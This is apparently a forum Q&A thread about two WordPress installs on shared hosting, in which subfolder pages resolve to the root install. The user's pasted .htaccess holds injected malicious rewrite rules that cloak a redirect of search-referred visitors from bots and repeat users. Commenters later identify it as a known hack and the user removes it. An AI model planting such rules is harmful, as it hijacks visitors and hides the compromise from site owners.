# Two Wordpress Installs — Failed page on One Defaults to the Other

Tags: multisite

I have hosting space at goDaddy that is shared between a couple domains. Originally I had a single wordpress install in a sub folder. Now I also have a wordpress install in the root directory also. The wordpress that was installed first in the sub folder works if you go to the home page, but if you try to go to a different page or look at archived posts it looks for the page or posts on the wordpress blog installed in the root directory. How do I go about fixing this?

.htaccess (both root and sub)

```
# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|XXXXXXXXXXXXXXXX\.|\/XXXXXXXXXXXXXXXX\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|XXXXXXXXXXXXXXXX|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|XXXXXXXXXXXXXXXX\s95|XXXXXXXXXXXXXXXX\s98|XXXXXXXXXXXXXXXX\sCE|XXXXXXXXXXXXXXXX\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
RewriteRule ^xxx$ http://www.google.com/ [R=301,L]
# exgocgkctswo
```

Answer (score 1, accepted):

I'm wondering if you simply copied your files from the sub directory's install into the root directory? That wouldn't be how you want to create a multisite. Check out the instructions here:
http://codex.wordpress.org/Create_A_Network

Secondly, if you go into your sub directory's install, look at the wp-config.php file and compare it to the wp-config.php file in the root directory; do they have the exact same DB info? For a second install, you need to at least give the database a prefix so it can separate the two installs within the schema.

Hope that helps!

**EDIT** (from comments below): if you look in the .htaccess file of your root install you'll see this:

```
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
```

You're going to need an additional RewriteCond to exclude the directory of your second install - otherwise the root wp install will handle the request.

The documentation to do that using mod_rewrite is here:
http://httpd.apache.org/docs/2.2/mod/mod_rewrite.html

Comment: The database names are different.  None of the connection information matches.  The problem seems to be with my permalink structure.  What used to work now searches in the root wordpress site by default.

Comment: Ahhh... I see. I think it's the collision of two .htaccess files fighting it out. You're probably going to have to edit the .htaccess file in your root install. Right now your sub-directory blog is being looked at like it's a custom taxonomy.

Comment: Can you give me any direction on how to do that, or what that means?  I can search for custom taxonomy, but I don't really know what do to with that information.

Comment: I didn't want to put all of that in a comment, so I just added it to my original response as an edit.

Comment: I posted the .htaccess content above.  The files are actually identical.  I don't see anything excluding the sub directory.

Comment: if you wanted to quickly check and see if that would be the issue - rename the .htaccess file of your root directory blog and see how apache handles your sub-directory blog. If all of a sudden your sub-directory blog works fine, then you know that's what's causing the issue.

Comment: That is not the issue.  The problem still exists.  Thank you for your comments though.

Comment: Doh! So you renamed the .htaccess file in the root wp install directory and it did not fix the issue? Noob question, but did you get a fresh copy of it - ctrl+shift+r or clear cache?

Comment: No I didn't. Where do I do the ctrl+shift+r thing?  I do not know where to regenerate the .htaccess file.

Comment: Sorry @NathanTornquist - ctrl+shift+r in your browser (at least in mozilla and chrome) will get a fresh copy. No regenerating anything... if it's not an .htaccess issue, not a plugin issue, I'd double check that your dns A records and CNAME's are in order. Good luck mate =]

Comment: Oh, I didn't catch that you wanted me to try a hard refresh of the page.  It didn't work either though.  Thanks for your help.  I'll look into those other options.

Comment: Hey @NathanTornquist - I was just perusing the interwebs looking for some answers to your htaccess issue... I'm finding the top label of your htaccess coming up a lot with hacked accounts/servers D= check out the [google search results for exgocgkctswo](https://www.google.com/search?q=exgocgkctswo). Good luck =]

Comment: Found this link on the subject [digital drake - wordpress site hacked](http://www.digitaldrake.com/wordpress-site-hacked/) - looks like you have to get rid of ALL of the htaccess files that look like this =\

Comment: That worked.  For some reason I cannot get it to work with my custom permalink structure anymore, but I can get over that.   Some functionality is better than none. Thank you.

Comment: Put the original wp .htaccess file back together - all it is, is putting a .htaccess file in the root of each site and in the file it'll say exactly what I put up there for you. That'll route all requests through the index.php (which will then handle the permalink structure stuff).

Comment: Tried that and it allowed me to set the permalinks back the way they had been, but I couldn't get any of the pages to load.  I think I may leave it.  It is working for now at least. Working poorly, but working.